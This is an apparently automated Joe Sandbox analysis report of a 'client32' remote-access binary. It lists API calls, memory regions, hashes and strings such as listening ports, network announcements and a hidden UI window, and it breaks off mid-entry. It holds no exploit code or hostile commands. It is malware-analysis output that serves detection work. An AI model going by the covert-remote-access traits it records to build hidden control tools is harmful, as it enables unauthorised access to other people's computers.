                                                                                  • Instruction ID: ed2c7270a583f493e0b466c25834e96d487c817f3cd2eef84f0062ec4251f30e
                                                                                  • Opcode Fuzzy Hash: 6cb80e4ba42ffe2f6d3fe0fc7e02658a82289641e696ec289b07654b65deaaf3
                                                                                  • Instruction Fuzzy Hash: 1721CEB9A013249FC350DFA9CC80A9AFBF8AF58204B14892EE42AD3605E771E400CB95
                                                                                  APIs
                                                                                    • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                    • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                    • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                    • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                    • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F516
                                                                                  • _free.LIBCMT ref: 1112131D
                                                                                    • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                    • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                  • _free.LIBCMT ref: 11121333
                                                                                  • _free.LIBCMT ref: 11121348
                                                                                  • GdiFlush.GDI32(?,?,?,02648EA0), ref: 11121350
                                                                                  • _free.LIBCMT ref: 1112135D
                                                                                  • _free.LIBCMT ref: 11121371
                                                                                  • SelectObject.GDI32(?,?), ref: 1112138D
                                                                                  • DeleteObject.GDI32(?), ref: 1112139A
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,02648EA0), ref: 111213A4
                                                                                  • DeleteDC.GDI32(?), ref: 111213CB
                                                                                  • ReleaseDC.USER32(?,?), ref: 111213DE
                                                                                  • DeleteDC.GDI32(?), ref: 111213EB
                                                                                  • InterlockedDecrement.KERNEL32(111EA9C8), ref: 111213F8
                                                                                  Strings
                                                                                  • Error deleting membm, e=%d, xrefs: 111213AB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
                                                                                  • String ID: Error deleting membm, e=%d
                                                                                  • API String ID: 3195047866-709490903
                                                                                  • Opcode ID: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                                  • Instruction ID: f7d3d32e9876efa9dbc162a5d98189d6a342c9de11ba00d9e1d1e6b63679a2c9
                                                                                  • Opcode Fuzzy Hash: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                                  • Instruction Fuzzy Hash: 892144B96107019BD214DFB5D9C8A9BF7E8FF98319F10491CE9AE83204EB35B501CB65
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 11053A8A
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                    • Part of subcall function 11041F40: inet_ntoa.WSOCK32(?,?,?,?,110539A4,00000000,?,?,50D94AA1,?,?), ref: 11041F52
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountErrorExitLastMessageProcessTickinet_ntoawsprintf
                                                                                  • String ID: %s:%u$Announce Error from %s. Invalid crc - ignoring$Announcement from %s [announcer-apptype: 0x%x] [target-apptype: 0x%x] [flags: 0x%08x]$IsA()$ListenPort$NSMWControl32$NSSWControl32$NSTWControl32$Port$TCPIP$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$port
                                                                                  • API String ID: 3701541597-1781216912
                                                                                  • Opcode ID: 011a09e4ebf555cb1d293c9696a7e6a42301eb6d37c4b5b12f9704b45b5c4a0d
                                                                                  • Instruction ID: 5c383da36f12d4855d2941ef62f3cc5b6d46123aa205a4bcc3d01b822d31dab0
                                                                                  • Opcode Fuzzy Hash: 011a09e4ebf555cb1d293c9696a7e6a42301eb6d37c4b5b12f9704b45b5c4a0d
                                                                                  • Instruction Fuzzy Hash: 3AD1A278E0461AABDF84DF94DC91FEEF7B5EF85308F044159E816AB245EB30A904CB61
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                  • GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                  • GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 110CF2FC
                                                                                  • GetClientRect.USER32(00000000,?), ref: 110CF3C3
                                                                                  • CreateWindowExA.USER32(00000000,Static,11195264,5000000E,?,?,00000010,00000010,?,00003A97,00000000,00000000), ref: 110CF400
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$Rect$ClientCreateItemLongObjectShowText
                                                                                  • String ID: ..\ctl32\nsmdlg.cpp$Static$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                  • API String ID: 4172769820-2231854162
                                                                                  • Opcode ID: 65bc0e660380c42035a20732b64b716a1f83c677b339e53b07408d9ca9b16d2e
                                                                                  • Instruction ID: 2d84ac58a4c57407e54c3cb5711102d4444eebaf719169cc73b89b5b27c55d8a
                                                                                  • Opcode Fuzzy Hash: 65bc0e660380c42035a20732b64b716a1f83c677b339e53b07408d9ca9b16d2e
                                                                                  • Instruction Fuzzy Hash: 8F81C375E00716ABD721CF64CC85F9EB3F4BB88B08F0045ADE5569B680EB74A940CF92
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(0000017D,50D94AA1,0000017D,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
                                                                                  • _memset.LIBCMT ref: 1110F4C2
                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110F58E
                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110F5B9
                                                                                  • WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110F5CE
                                                                                    • Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?), ref: 11110008
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1118B168,000000FF), ref: 1110F5F5
                                                                                  • _free.LIBCMT ref: 1110F628
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F665
                                                                                  • timeEndPeriod.WINMM(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F677
                                                                                  • LeaveCriticalSection.KERNEL32(0000017D,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001,50D94AA1,0000017D,00000001), ref: 1110F681
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriod_free_memsettime
                                                                                  • String ID: End Record %s$PCIR
                                                                                  • API String ID: 4278564793-2672865668
                                                                                  • Opcode ID: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                  • Instruction ID: c7b3bd1ea8319edfd3cc52dfdc755cda258f2b25611d18eaf89bf58ef2166273
                                                                                  • Opcode Fuzzy Hash: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                  • Instruction Fuzzy Hash: 32811875A0070AABD724CFA4C881BEBF7F8FF88704F00492DE66A97240D775A941CB91
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(Wtsapi32.dll,50D94AA1,1102E747,?,00000000), ref: 110F711B
                                                                                  • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7179
                                                                                  • wsprintfA.USER32 ref: 110F7235
                                                                                  • SetLastError.KERNEL32(00000078), ref: 110F7242
                                                                                  • wsprintfA.USER32 ref: 110F7267
                                                                                  • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F72A7
                                                                                  • SetLastError.KERNEL32(00000078), ref: 110F72BC
                                                                                  • FreeLibrary.KERNEL32(?), ref: 110F72D0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressErrorLastLibraryProcwsprintf$FreeLoad
                                                                                  • String ID: %u.%u.%u.%u$%x:%x:%x:%x:%x:%x:%x:%x$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                                  • API String ID: 856016564-3838485836
                                                                                  • Opcode ID: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                                  • Instruction ID: 25a542e7ca9f20ccb9d734b321771151ba7e8120a74b68384c663ef2db5eebf1
                                                                                  • Opcode Fuzzy Hash: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                                  • Instruction Fuzzy Hash: 2161B771D042689FDB18CFA98C98AADFFF5BF49301F0581AEF16A97251D6345904CF20
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                  • SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                  • SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                                  • SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                  • SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                  • GetDC.USER32(?), ref: 11025085
                                                                                  • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                  • SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                                  • GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                  • SelectObject.GDI32(?,?), ref: 110250C7
                                                                                  • ReleaseDC.USER32(?,?), ref: 110250CF
                                                                                  • SetCaretPos.USER32(?,?), ref: 11025111
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessageSend$ObjectSelect$CaretExtentPoint32ReleaseText
                                                                                  • String ID:
                                                                                  • API String ID: 4100900918-3916222277
                                                                                  • Opcode ID: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                                  • Instruction ID: b0707e50622e5a2dee3f64ca7938c426cfa52823b6f102614556d1b444951bd6
                                                                                  • Opcode Fuzzy Hash: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                                  • Instruction Fuzzy Hash: 84414C71A41318AFEB10DFA4CD84FAEBBF8EF89700F118169F915AB244DB749900CB60
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 1101F0FE
                                                                                  • SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 1101F11D
                                                                                    • Part of subcall function 110CCE60: GetWindowRect.USER32(110CEFF5,?), ref: 110CCE7C
                                                                                    • Part of subcall function 110CCE60: SetRectEmpty.USER32(?), ref: 110CCE88
                                                                                  • DeleteObject.GDI32(00000000), ref: 1101F16C
                                                                                  • DeleteObject.GDI32(00000000), ref: 1101F178
                                                                                  • CreateFontIndirectA.GDI32(?), ref: 1101F187
                                                                                  • CreateFontIndirectA.GDI32(?), ref: 1101F19F
                                                                                  • GetMenuItemCount.USER32 ref: 1101F1A7
                                                                                  • _memset.LIBCMT ref: 1101F1CF
                                                                                  • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F20C
                                                                                  • __strdup.LIBCMT ref: 1101F221
                                                                                  • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1101F279
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InfoItemMenu$CreateDeleteFontIndirectObjectRect_memset$CountEmptyParametersSystemWindow__strdup
                                                                                  • String ID: 0$MakeOwnerDraw
                                                                                  • API String ID: 1249465458-1190305232
                                                                                  • Opcode ID: 8c9bd2224f42fac49adbc09d6f8f2acc0ae91da077bc4100c348b21e51c723fb
                                                                                  • Instruction ID: cad075490b8b101532292c9a84c7126ab9bfd0db94d612dc2b0baac2de7b47d0
                                                                                  • Opcode Fuzzy Hash: 8c9bd2224f42fac49adbc09d6f8f2acc0ae91da077bc4100c348b21e51c723fb
                                                                                  • Instruction Fuzzy Hash: 19417E71D012399BDB64DFA4CC89BD9FBB8BB09708F0001D9E508A7284DBB46A84CF94
                                                                                  APIs
                                                                                    • Part of subcall function 1115BAE0: IsIconic.USER32(?), ref: 1115BB87
                                                                                    • Part of subcall function 1115BAE0: ShowWindow.USER32(?,00000009), ref: 1115BB97
                                                                                    • Part of subcall function 1115BAE0: BringWindowToTop.USER32(?), ref: 1115BBA1
                                                                                  • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102384D
                                                                                  • ShowWindow.USER32(?,00000003), ref: 110238D1
                                                                                  • LoadMenuA.USER32(00000000,000013A3), ref: 110239FB
                                                                                  • GetSubMenu.USER32(00000000,00000000), ref: 11023A09
                                                                                  • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023A29
                                                                                  • GetDlgItem.USER32(?,000013B2), ref: 11023A3C
                                                                                  • GetWindowRect.USER32(00000000), ref: 11023A43
                                                                                  • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023A99
                                                                                  • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 11023AA3
                                                                                  Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: the same twelve 0000000B.00000002.* regions listed for the first function entry above
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                                  • String ID: AddToJournal$Chat
                                                                                  • API String ID: 693070851-2976406578
                                                                                  • Opcode ID: 4e8affa197535ad0660103244a90f227890d3a0ada2779ccdef05f8d718aa204
                                                                                  • Instruction ID: 808c1e48a155f27d2b3c0586fadc3707d2cf985dccefb9094def5a9ab05a8e38
                                                                                  • Opcode Fuzzy Hash: 4e8affa197535ad0660103244a90f227890d3a0ada2779ccdef05f8d718aa204
                                                                                  • Instruction Fuzzy Hash: 58A10334F44616ABDB08CF64CC85FAEB3E9AB8C704F50452DE6569F6C0DBB4A900CB95
                                                                                  APIs
                                                                                    • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                    • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                    • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • GetLocalTime.KERNEL32(?), ref: 110A1778
                                                                                  Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: the same twelve 0000000B.00000002.* regions listed for the first function entry above
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastLocalMessageProcessTime__strdup_freewsprintfwvsprintf
                                                                                  • String ID: %s\$%s\%s$%s_$CLASSID=$IsA()$LESSON=$[JNL] MakeFileName ret %s$\/:*?"<>|$_%04d_%02d_%02d_%02d%02d$_%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                  • API String ID: 2014016395-1677429133
                                                                                  • Opcode ID: 880920969d41afe499fca9c871a626bbba516486696330b4c6c744914744d6f5
                                                                                  • Instruction ID: aef08c5c19416ca6c78363d8fb1b9fc7de7af93cef0e20b47086b6b370679a0b
                                                                                  • Opcode Fuzzy Hash: 880920969d41afe499fca9c871a626bbba516486696330b4c6c744914744d6f5
                                                                                  • Instruction Fuzzy Hash: 44B1AF79E00229ABDB15DBA4DD41FEDB7F5AF59388F0441D4E80A67280EB307B44CEA5
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,11139C95,00000000), ref: 11131428
                                                                                  • ShowWindow.USER32(00000000,00000000,?,11139C95,00000000), ref: 11131457
                                                                                  Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: the same twelve 0000000B.00000002.* regions listed for the first function entry above
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastShowWindow
                                                                                  • String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
                                                                                  • API String ID: 3252650109-4091810678
                                                                                  • Opcode ID: 3934f158285cda88db21c3109430663c83d793430f4a9331a1973ddc11de89e1
                                                                                  • Instruction ID: 1b40a51cdbaebc86ba70b46d463032212dc909346aab7ab50ce078dfded898e8
                                                                                  • Opcode Fuzzy Hash: 3934f158285cda88db21c3109430663c83d793430f4a9331a1973ddc11de89e1
                                                                                  • Instruction Fuzzy Hash: 2161D571B84325ABE711CF90CC85F69F774E784B29F104129F625AB2C4EBB56940CB84
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(Wtsapi32.dll,50D94AA1,1102E747,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110F732D
                                                                                  • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7372
                                                                                  • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73C3
